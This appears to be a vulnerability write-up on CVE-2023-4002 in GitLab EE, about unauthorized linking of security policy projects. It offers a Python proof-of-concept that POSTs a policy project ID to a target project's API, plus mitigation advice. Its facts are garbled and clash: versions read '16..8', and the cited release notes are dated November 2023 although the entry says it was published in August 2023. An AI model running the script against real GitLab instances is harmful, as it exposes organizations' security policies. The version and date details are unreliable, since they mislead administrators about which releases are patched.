CVE-2023-4002: Unauthorized linking of security policy projects in GitLab EE

A critical security vulnerability, identified as CVE-2023-4002, has been uncovered in GitLab's Enterprise Edition (EE) that potentially enables unauthorized users to link security policy projects by their ID to projects or groups they have access to. This issue affects all versions starting from 14.1 before 16..8, all versions starting from 16.1 before 16.1.3, all versions starting from 16.2 before 16.2.2. As a result, this could lead to unintended disclosure of security policies implemented within an organization.

Exploit Details

This vulnerability stems from improper access controls in GitLab EE. Specifically, the issue allows EE-licensed users to link any security policy project by using its ID to other projects or groups to which the user has access. Consequently, this behavior can potentially reveal the configured security policies within the security policy project.

For example, an attacker can leverage this flaw to gain information on policies or other sensitive data that should be kept private. By exploiting this vulnerability, the attacker may compromise the security of vulnerable GitLab instances and gain unauthorized access to sensitive information.

Code Snippet

To illustrate the vulnerability, consider the following code snippet, which is a simplified version of the actual exploit:

import requests

# Replace the following variables with your respective values
GITLAB_BASE_URL = 'https://gitlab.example.com';
API_ACCESS_TOKEN = 'your-api-access-token'
TARGET_PROJECT_ID = 'target-project-id'
SECURITY_POLICY_PROJECT_ID = 'security-policy-project-id'

url = f"{GITLAB_BASE_URL}/api/v4/projects/{TARGET_PROJECT_ID}/security_policy_project"

headers = {
    "Private-Token": API_ACCESS_TOKEN
}

data = {
    "security_policy_project_id": SECURITY_POLICY_PROJECT_ID
}

response = requests.post(url, headers=headers, data=data)

if response.status_code == 201:
    print("Security policy project linked successfully!")
else:
    print("An error occurred while linking the security policy project.")

GitLab's official issue tracking page for this vulnerability:

https://gitlab.com/gitlab-org/gitlab/-/issues/44071

GitLab's official release notes, where the vulnerability was disclosed and addressed:

https://about.gitlab.com/releases/2023/11/15/security-release-gitlab-16--8-16-1-3-and-16-2-2/

Mitigation

The GitLab security team has addressed this issue in versions 16..8, 16.1.3, and 16.2.2. It is highly recommended that all affected GitLab EE installations be immediately upgraded to these patched versions to protect against potential exploits of this vulnerability.

Additionally, administrators should review and audit user accounts with access to projects and groups within their GitLab instances, ensuring that only trusted and authorized users have permissions to link security policy projects.

Conclusion

This post has detailed the security vulnerability CVE-2023-4002 found in GitLab EE that allows unauthorized linking and potential exposure of security policy projects. By promptly addressing the issue and incorporating the suggested mitigation steps, organizations can protect their GitLab instances and help safeguard sensitive security policy information.

Timeline

Published on: 08/04/2023 01:15:00 UTC
Last modified on: 08/08/2023 18:46:00 UTC